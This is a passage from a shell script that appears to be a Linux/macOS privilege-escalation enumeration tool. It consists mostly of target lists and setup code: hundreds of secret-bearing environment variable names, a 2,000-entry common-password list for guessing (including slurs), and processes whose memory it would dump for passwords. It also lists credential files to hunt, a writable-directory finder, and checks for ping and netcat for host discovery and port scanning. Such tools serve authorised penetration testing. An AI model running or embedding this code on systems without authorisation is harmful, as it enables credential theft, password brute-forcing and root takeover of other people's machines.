_STORE_BUCKET|OBJECT_STORE_CREDS|OCTEST_SERVER_BASE_URL|OCTEST_SERVER_BASE_URL_2|OC_PASS|OFTA_KEY|OFTA_SECRET|OKTA_CLIENT_TOKEN|OKTA_DOMAIN|OKTA_OAUTH2_CLIENTID|OKTA_OAUTH2_CLIENTSECRET|OKTA_OAUTH2_CLIENT_ID|OKTA_OAUTH2_CLIENT_SECRET" +pwd_in_variables8="OKTA_OAUTH2_ISSUER|OMISE_KEY|OMISE_PKEY|OMISE_PUBKEY|OMISE_SKEY|ONESIGNAL_API_KEY|ONESIGNAL_USER_AUTH_KEY|OPENWHISK_KEY|OPEN_WHISK_KEY|OSSRH_PASS|OSSRH_SECRET|OSSRH_USER|OS_AUTH_URL|OS_PROJECT_NAME|OS_TENANT_ID|OS_TENANT_NAME|PAGERDUTY_APIKEY|PAGERDUTY_ESCALATION_POLICY_ID|PAGERDUTY_FROM_USER|PAGERDUTY_PRIORITY_ID|PAGERDUTY_SERVICE_ID|PANTHEON_SITE|PARSE_APP_ID|PARSE_JS_KEY|PAYPAL_CLIENT_ID|PAYPAL_CLIENT_SECRET|PERCY_TOKEN|PERSONAL_KEY|PERSONAL_SECRET|PG_DATABASE|PG_HOST|PLACES_APIKEY|PLACES_API_KEY|PLACES_APPID|PLACES_APPLICATION_ID|PLOTLY_APIKEY|POSTGRESQL_DB|POSTGRESQL_PASS|POSTGRES_ENV_POSTGRES_DB|POSTGRES_ENV_POSTGRES_USER|POSTGRES_PORT|PREBUILD_AUTH|PROD.ACCESS.KEY.ID|PROD.SECRET.KEY|PROD_BASE_URL_RUNSCOPE|PROJECT_CONFIG|PUBLISH_KEY|PUBLISH_SECRET|PUSHOVER_TOKEN|PUSHOVER_USER|PYPI_PASSOWRD|QUIP_TOKEN|RABBITMQ_SERVER_ADDR|REDISCLOUD_URL|REDIS_STUNNEL_URLS|REFRESH_TOKEN|RELEASE_GH_TOKEN|RELEASE_TOKEN|remoteUserToShareTravis|REPORTING_WEBDAV_URL|REPORTING_WEBDAV_USER|repoToken|REST_API_KEY|RINKEBY_PRIVATE_KEY|ROPSTEN_PRIVATE_KEY|route53_access_key_id|RTD_KEY_PASS|RTD_STORE_PASS|RUBYGEMS_AUTH_TOKEN|s3_access_key|S3_ACCESS_KEY_ID|S3_BUCKET_NAME_APP_LOGS|S3_BUCKET_NAME_ASSETS|S3_KEY" +pwd_in_variables9="S3_KEY_APP_LOGS|S3_KEY_ASSETS|S3_PHOTO_BUCKET|S3_SECRET_APP_LOGS|S3_SECRET_ASSETS|S3_SECRET_KEY|S3_USER_ID|S3_USER_SECRET|SACLOUD_ACCESS_TOKEN|SACLOUD_ACCESS_TOKEN_SECRET|SACLOUD_API|SALESFORCE_BULK_TEST_SECURITY_TOKEN|SANDBOX_ACCESS_TOKEN|SANDBOX_AWS_ACCESS_KEY_ID|SANDBOX_AWS_SECRET_ACCESS_KEY|SANDBOX_LOCATION_ID|SAUCE_ACCESS_KEY|SECRETACCESSKEY|SECRETKEY|SECRET_0|SECRET_10|SECRET_11|SECRET_1|SECRET_2|SECRET_3|SECRET_4|SECRET_5|SECRET_6|SECRET_7|SECRET_8|SECRET_9|SECRET_KEY_BASE|SEGMENT_API_KEY|SELION_SELENIUM_SAUCELAB_GRID_CONFIG_FILE|SELION_SELENIUM_USE_SAUCELAB_GRID|SENDGRID|SENDGRID_API_KEY|SENDGRID_FROM_ADDRESS|SENDGRID_KEY|SENDGRID_USER|SENDWITHUS_KEY|SENTRY_AUTH_TOKEN|SERVICE_ACCOUNT_SECRET|SES_ACCESS_KEY|SES_SECRET_KEY|setDstAccessKey|setDstSecretKey|setSecretKey|SIGNING_KEY|SIGNING_KEY_SECRET|SIGNING_KEY_SID|SNOOWRAP_CLIENT_SECRET|SNOOWRAP_REDIRECT_URI|SNOOWRAP_REFRESH_TOKEN|SNOOWRAP_USER_AGENT|SNYK_API_TOKEN|SNYK_ORG_ID|SNYK_TOKEN|SOCRATA_APP_TOKEN|SOCRATA_USER|SONAR_ORGANIZATION_KEY|SONAR_PROJECT_KEY|SONAR_TOKEN|SONATYPE_GPG_KEY_NAME|SONATYPE_GPG_PASSPHRASE|SONATYPE_PASSSONATYPE_TOKEN_USER|SONATYPE_USER|SOUNDCLOUD_CLIENT_ID|SOUNDCLOUD_CLIENT_SECRET|SPACES_ACCESS_KEY_ID|SPACES_SECRET_ACCESS_KEY" +pwd_in_variables10="SPA_CLIENT_ID|SPOTIFY_API_ACCESS_TOKEN|SPOTIFY_API_CLIENT_ID|SPOTIFY_API_CLIENT_SECRET|sqsAccessKey|sqsSecretKey|SRCCLR_API_TOKEN|SSHPASS|SSMTP_CONFIG|STARSHIP_ACCOUNT_SID|STARSHIP_AUTH_TOKEN|STAR_TEST_AWS_ACCESS_KEY_ID|STAR_TEST_BUCKET|STAR_TEST_LOCATION|STAR_TEST_SECRET_ACCESS_KEY|STORMPATH_API_KEY_ID|STORMPATH_API_KEY_SECRET|STRIPE_PRIVATE|STRIPE_PUBLIC|STRIP_PUBLISHABLE_KEY|STRIP_SECRET_KEY|SURGE_LOGIN|SURGE_TOKEN|SVN_PASS|SVN_USER|TESCO_API_KEY|THERA_OSS_ACCESS_ID|THERA_OSS_ACCESS_KEY|TRAVIS_ACCESS_TOKEN|TRAVIS_API_TOKEN|TRAVIS_COM_TOKEN|TRAVIS_E2E_TOKEN|TRAVIS_GH_TOKEN|TRAVIS_PULL_REQUEST|TRAVIS_SECURE_ENV_VARS|TRAVIS_TOKEN|TREX_CLIENT_ORGURL|TREX_CLIENT_TOKEN|TREX_OKTA_CLIENT_ORGURL|TREX_OKTA_CLIENT_TOKEN|TWILIO_ACCOUNT_ID|TWILIO_ACCOUNT_SID|TWILIO_API_KEY|TWILIO_API_SECRET|TWILIO_CHAT_ACCOUNT_API_SERVICE|TWILIO_CONFIGURATION_SID|TWILIO_SID|TWILIO_TOKEN|TWITTEROAUTHACCESSSECRET|TWITTEROAUTHACCESSTOKEN|TWITTER_CONSUMER_KEY|TWITTER_CONSUMER_SECRET|UNITY_SERIAL|URBAN_KEY|URBAN_MASTER_SECRET|URBAN_SECRET|userTravis|USER_ASSETS_ACCESS_KEY_ID|USER_ASSETS_SECRET_ACCESS_KEY|VAULT_APPROLE_SECRET_ID|VAULT_PATH|VIP_GITHUB_BUILD_REPO_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY_PASS" +pwd_in_variables11="VIRUSTOTAL_APIKEY|VISUAL_RECOGNITION_API_KEY|V_SFDC_CLIENT_ID|V_SFDC_CLIENT_SECRET|WAKATIME_API_KEY|WAKATIME_PROJECT|WATSON_CLIENT|WATSON_CONVERSATION_WORKSPACE|WATSON_DEVICE|WATSON_DEVICE_TOPIC|WATSON_TEAM_ID|WATSON_TOPIC|WIDGET_BASIC_USER_2|WIDGET_BASIC_USER_3|WIDGET_BASIC_USER_4|WIDGET_BASIC_USER_5|WIDGET_FB_USER|WIDGET_FB_USER_2|WIDGET_FB_USER_3|WIDGET_TEST_SERVERWORDPRESS_DB_USER|WORKSPACE_ID|WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY|WPT_DB_HOST|WPT_DB_NAME|WPT_DB_USER|WPT_PREPARE_DIR|WPT_REPORT_API_KEY|WPT_SSH_CONNECT|WPT_SSH_PRIVATE_KEY_BASE64|YANGSHUN_GH_TOKEN|YT_ACCOUNT_CHANNEL_ID|YT_ACCOUNT_CLIENT_ID|YT_ACCOUNT_CLIENT_SECRET|YT_ACCOUNT_REFRESH_TOKEN|YT_API_KEY|YT_CLIENT_ID|YT_CLIENT_SECRET|YT_PARTNER_CHANNEL_ID|YT_PARTNER_CLIENT_ID|YT_PARTNER_CLIENT_SECRET|YT_PARTNER_ID|YT_PARTNER_REFRESH_TOKEN|YT_SERVER_API_KEY|ZHULIANG_GH_TOKEN|ZOPIM_ACCOUNT_KEY" + +top2000pwds="123456 password 123456789 12345678 12345 qwerty 123123 111111 abc123 1234567 dragon 1q2w3e4r sunshine 654321 master 1234 football 1234567890 000000 computer 666666 superman michael internet iloveyou daniel 1qaz2wsx monkey shadow jessica letmein baseball whatever princess abcd1234 123321 starwars 121212 thomas zxcvbnm trustno1 killer welcome jordan aaaaaa 123qwe freedom password1 charlie batman jennifer 7777777 michelle diamond oliver mercedes benjamin 11111111 snoopy samantha victoria matrix george alexander secret cookie asdfgh 987654321 123abc orange fuckyou asdf1234 pepper hunter silver joshua banana 1q2w3e chelsea 1234qwer summer qwertyuiop phoenix andrew q1w2e3r4 elephant rainbow mustang merlin london garfield robert chocolate 112233 samsung qazwsx matthew buster jonathan ginger flower 555555 test caroline amanda maverick midnight martin junior 88888888 anthony jasmine creative patrick mickey 123 qwerty123 cocacola chicken passw0rd forever william nicole hello yellow nirvana justin friends cheese tigger mother liverpool blink182 asdfghjkl andrea spider scooter richard soccer rachel purple morgan melissa jackson arsenal 222222 qwe123 gabriel ferrari jasper danielle bandit angela scorpion prince maggie austin veronica nicholas monster dexter carlos thunder success hannah ashley 131313 stella brandon pokemon joseph asdfasdf 999999 metallica december chester taylor sophie samuel rabbit crystal barney xxxxxx steven ranger patricia christian asshole spiderman sandra hockey angels security parker heather 888888 victor harley 333333 system slipknot november jordan23 canada tennis qwertyui casper gemini asd123 winter hammer cooper america albert 777777 winner charles butterfly swordfish popcorn penguin dolphin carolina access 987654 hardcore corvette apples 12341234 sabrina remember qwer1234 edward dennis cherry sparky natasha arthur vanessa marina leonardo johnny dallas antonio winston +snickers olivia nothing iceman destiny coffee apollo 696969 windows williams school madison dakota angelina anderson 159753 1111 yamaha trinity rebecca nathan guitar compaq 123123123 toyota shannon playboy peanut pakistan diablo abcdef maxwell golden asdasd 123654 murphy monica marlboro kimberly gateway bailey 00000000 snowball scooby nikita falcon august test123 sebastian panther love johnson godzilla genesis brandy adidas zxcvbn wizard porsche online hello123 fuckoff eagles champion bubbles boston smokey precious mercury lauren einstein cricket cameron angel admin napoleon mountain lovely friend flowers dolphins david chicago sierra knight yankees wilson warrior simple nelson muffin charlotte calvin spencer newyork florida fernando claudia basketball barcelona 87654321 willow stupid samson police paradise motorola manager jaguar jackie family doctor bullshit brooklyn tigers stephanie slayer peaches miller heaven elizabeth bulldog animal 789456 scorpio rosebud qwerty12 franklin claire american vincent testing pumpkin platinum louise kitten general united turtle marine icecream hacker darkness cristina colorado boomer alexandra steelers serenity please montana mitchell marcus lollipop jessie happy cowboy 102030 marshall jupiter jeremy gibson fucker barbara adrian 1qazxsw2 12344321 11111 startrek fishing digital christine business abcdefg nintendo genius 12qwaszx walker q1w2e3 player legend carmen booboo tomcat ronaldo people pamela marvin jackass google fender asdfghjk Password 1q2w3e4r5t zaq12wsx scotland phantom hercules fluffy explorer alexis walter trouble tester qwerty1 melanie manchester gordon firebird engineer azerty 147258 virginia tiger simpsons passion lakers james angelica 55555 vampire tiffany september private maximus loveme isabelle isabella eclipse dreamer changeme cassie badboy 123456a stanley sniper rocket passport pandora justice infinity cookies barbie xavier unicorn superstar +stephen rangers orlando money domino courtney viking tucker travis scarface pavilion nicolas natalie gandalf freddy donald captain abcdefgh a1b2c3d4 speedy peter nissan loveyou harrison friday francis dancer 159357 101010 spitfire saturn nemesis little dreams catherine brother birthday 1111111 wolverine victory student france fantasy enigma copper bonnie teresa mexico guinness georgia california sweety logitech julian hotdog emmanuel butter beatles 11223344 tristan sydney spirit october mozart lolita ireland goldfish eminem douglas cowboys control cheyenne alex testtest stargate raiders microsoft diesel debbie danger chance asdf anything aaaaaaaa welcome1 qwert hahaha forest eternity disney denise carter alaska zzzzzz titanic shorty shelby pookie pantera england chris zachary westside tamara password123 pass maryjane lincoln willie teacher pierre michael1 leslie lawrence kristina kawasaki drowssap college blahblah babygirl avatar alicia regina qqqqqq poohbear miranda madonna florence sapphire norman hamilton greenday galaxy frankie black awesome suzuki spring qazwsxedc magnum lovers liberty gregory 232323 twilight timothy swimming super stardust sophia sharon robbie predator penelope michigan margaret jesus hawaii green brittany brenda badger a1b2c3 444444 winnie wesley voodoo skippy shithead redskins qwertyu pussycat houston horses gunner fireball donkey cherokee australia arizona 1234abcd skyline power perfect lovelove kermit kenneth katrina eugene christ thailand support special runner lasvegas jason fuckme butthead blizzard athena abigail 8675309 violet tweety spanky shamrock red123 rascal melody joanna hello1 driver bluebird biteme atlantis arnold apple alison taurus random pirate monitor maria lizard kevin hummer holland buffalo 147258369 007007 valentine roberto potter magnolia juventus indigo indian harvey duncan diamonds daniela christopher bradley bananas warcraft sunset simone renegade +redsox philip monday mohammed indiana energy bond007 avalon terminator skipper shopping scotty savannah raymond morris mnbvcxz michele lucky lucifer kingdom karina giovanni cynthia a123456 147852 12121212 wildcats ronald portugal mike helpme froggy dragons cancer bullet beautiful alabama 212121 unknown sunflower sports siemens santiago kathleen hotmail hamster golfer future father enterprise clifford christina camille camaro beauty 55555555 vision tornado something rosemary qweasd patches magic helena denver cracker beaver basket atlanta vacation smiles ricardo pascal newton jeffrey jasmin january honey hollywood holiday gloria element chandler booger angelo allison action 99999999 target snowman miguel marley lorraine howard harmony children celtic beatrice airborne wicked voyager valentin thx1138 thumper samurai moonlight mmmmmm karate kamikaze jamaica emerald bubble brooke zombie strawberry spooky software simpson service sarah racing qazxsw philips oscar minnie lalala ironman goddess extreme empire elaine drummer classic carrie berlin asdfg 22222222 valerie tintin therock sunday skywalker salvador pegasus panthers packers network mission mark legolas lacrosse kitty kelly jester italia hiphop freeman charlie1 cardinal bluemoon bbbbbb bastard alyssa 0123456789 zeppelin tinker surfer smile rockstar operator naruto freddie dragonfly dickhead connor anaconda amsterdam alfred a12345 789456123 77777777 trooper skittles shalom raptor pioneer personal ncc1701 nascar music kristen kingkong global geronimo germany country christmas bernard benson wrestling warren techno sunrise stefan sister savage russell robinson oracle millie maddog lightning kingston kennedy hannibal garcia download dollar darkstar brutus bobby autumn webster vanilla undertaker tinkerbell sweetpea ssssss softball rafael panasonic pa55word keyboard isabel hector fisher dominic darkside cleopatra blue assassin amelia vladimir roland +nigger national monique molly matthew1 godfather frank curtis change central cartman brothers boogie archie warriors universe turkey topgun solomon sherry sakura rush2112 qwaszx office mushroom monika marion lorenzo john herman connect chopper burton blondie bitch bigdaddy amber 456789 1a2b3c4d ultimate tequila tanner sweetie scott rocky popeye peterpan packard loverboy leonard jimmy harry griffin design buddha 1 wallace truelove trombone toronto tarzan shirley sammy pebbles natalia marcel malcolm madeline jerome gilbert gangster dingdong catalina buddy blazer billy bianca alejandro 54321 252525 111222 0000 water sucker rooster potato norton lucky1 loving lol123 ladybug kittycat fuck forget flipper fireman digger bonjour baxter audrey aquarius 1111111111 pppppp planet pencil patriots oxford million martha lindsay laura jamesbond ihateyou goober giants garden diana cecilia brazil blessing bishop bigdog airplane Password1 tomtom stingray psycho pickle outlaw number1 mylove maurice madman maddie lester hendrix hellfire happy1 guardian flamingo enter chichi 0987654321 western twister trumpet trixie socrates singer sergio sandman richmond piglet pass123 osiris monkey1 martina justine english electric church castle caesar birdie aurora artist amadeus alberto 246810 whitney thankyou sterling star ronnie pussy printer picasso munchkin morpheus madmax kaiser julius imperial happiness goodluck counter columbia campbell blessed blackjack alpha 999999999 142536 wombat wildcat trevor telephone smiley saints pretty oblivion newcastle mariana janice israel imagine freedom1 detroit deedee darren catfish adriana washington warlock valentina valencia thebest spectrum skater sheila shaggy poiuyt member jessica1 jeremiah jack insane iloveu handsome goldberg gabriela elijah damien daisy buttons blabla bigboy apache anthony1 a1234567 xxxxxxxx toshiba tommy sailor peekaboo motherfucker montreal manuel madrid kramer +katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat bentley account 321321 2222 1a2b3c thompson theman strike stacey science running research polaris oklahoma mariposa marie leader julia island idontknow hitman german felipe fatcat fatboy defender applepie annette 010203 watson travel sublime stewart steve squirrel simon sexy pineapple phoebe paris panzer nadine master1 mario kelsey joker hongkong gorilla dinosaur connie bowling bambam babydoll aragorn andreas 456123 151515 wolves wolfgang turner semperfi reaper patience marilyn fletcher drpepper dorothy creation brian bluesky andre yankee wordpass sweet spunky sidney serena preston pauline passwort original nightmare miriam martinez labrador kristin kissme henry gerald garrett flash excalibur discovery dddddd danny collins casino broncos brendan brasil apple123 yvonne wonder window tomato sundance sasha reggie redwings poison mypassword monopoly mariah margarita lionking king football1 director darling bubba biscuit 44444444 wisdom vivian virgin sylvester street stones sprite spike single sherlock sandy rocker robin matt marianne linda lancelot jeanette hobbes fred ferret dodger cotton corona clayton celine cannabis bella andromeda 7654321 4444 werewolf starcraft sampson redrum pyramid prodigy paul michel martini marathon longhorn leopard judith joanne jesus1 inferno holly harold happy123 esther dudley dragon1 darwin clinton celeste catdog brucelee argentina alpine 147852369 wrangler william1 vikings trigger stranger silvia shotgun scarlett scarlet redhead raider qweasdzxc playstation mystery morrison honda february fantasia designer coyote cool bulldogs bernie baby asdfghj angel1 always adam 202020 wanker sullivan stealth skeeter saturday rodney prelude pingpong phillip peewee peanuts peace nugget newport myself mouse memphis lover lancer kristine james1 hobbit halloween fuckyou1 finger fearless dodgers delete cougar +charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna animals +andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive +plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude" +PASSTRY="2000" #Default num of passwds to try (all by default) + +if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this +SEDOVERFLOW=true +for grp in `groups $USER 2>/dev/null | cut -d ":" -f2`; do + wgroups="$wgroups -group $grp -or " +done +wgroups="`echo $wgroups | sed -e 's/ -or$//'`" +while $SEDOVERFLOW; do + #WF=`find /dev /srv /proc /home /media /sys /lost+found /run /etc /root /var /tmp /mnt /boot /opt -type d -maxdepth $MAXPATH_FIND_W -writable -or -user $USER 2>/dev/null | sort` + #if [ "$MACPEAS" ]; then + WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | sort` #OpenBSD find command doesn't have "-writable" option + #else + # WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" -and '(' -writable -or -user $USER ')' 2>/dev/null | sort` + #fi + Wfolders=`printf "%s" "$WF" | tr '\n' '|'`"|[^\*][^\ ]*\ \*" + Wfolder="`printf "%s" "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1`" + printf "test\ntest\ntest\ntest"| sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" >/dev/null 2>&1 + if [ $? -eq 0 ]; then + SEDOVERFLOW=false + else + MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) #If overflow of directories, check again with MAXPATH_FIND_W - 1 + fi + if [ $MAXPATH_FIND_W -lt 1 ] ; then # prevent infinite loop + SEDOVERFLOW=false + fi +done + +notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$|\.j2k$|\.j2c$|\.fpx$|\.pcd$|\.png$|\.pdf$|\.flv$|\.mp4$|\.mp3$|\.gifv$|\.avi$|\.mov$|\.mpeg$|\.wav$|\.doc$|\.docx$|\.xls$|\.xlsx$|\.svg$" + +TIMEOUT="`command -v timeout 2>/dev/null`" +STRACE="`command -v strace 2>/dev/null`" +STRINGS="`command -v strings 2>/dev/null`" + +shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh" + +notBackup="/tdbbackup$|/db_hotbackup$" + +cronjobsG=".placeholder|0anacron|0hourly|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-notifier-common|upstart" +cronjobsB="centreon" + +processesVB="jdwp|tmux |screen |--inspect|--remote-debugging-port" +processesB="knockd\|splunk" +processesDump="gdm-password|gnome-keyring-daemon|lightdm|vsftpd|apache2|sshd:" + +mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier" + +profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh" + +knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" + +timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-messaging.timer|ureadahead-stop.timer" + +commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" +commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" + +ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib" + +dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.opensuse.CupsPkHelper.Mechanism" + +CONTAINER_CMDS="docker lxc rkt kubectl podman runc" +TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible." +GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion" +GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig" +GREP_IGNORE_MOUNTS="/ /|/cgroup|/var/lib/docker/|/null | proc proc |/dev/console|docker.sock" + +INT_HIDDEN_FILES="._history.|.bashrc|.bluemix|.cer|.cloudflared|.crt|.csr|.db|.der|.env|.erlang.cookie|.ftpconfig|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.ldaprc|.lesshst|.mozilla|.msmtprc|.ovpn|.p12|.pem|.pfx|.pgp|.plan|.profile|.pypirc|.rdg|.recently-used.xbel|.rhosts|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.timer|.vault-token|.viminfo|.vnc" + +########################################### +#---------) Checks before start (---------# +########################################### +# --) ps working good +# --) Network binaries + +if [ `ps auxwww 2>/dev/null | wc -l 2>/dev/null` -lt 8 ]; then + NOUSEPS="1" +fi + +DISCOVER_BAN_BAD="No network discovery capabilities (fping or ping not found)" +FPING=$(command -v fping 2>/dev/null) +PING=$(command -v ping 2>/dev/null) +if [ "$FPING" ]; then + DISCOVER_BAN_GOOD="$GREEN$FPING${BLUE} is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" +else + if [ "$PING" ]; then + DISCOVER_BAN_GOOD="$GREEN$PING${BLUE} is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" + fi +fi + +SCAN_BAN_BAD="No port scan capabilities (nc not found)" +FOUND_NC=$(command -v nc 2>/dev/null) +if [ -z "$FOUND_NC" ]; then + FOUND_NC=$(command -v netcat 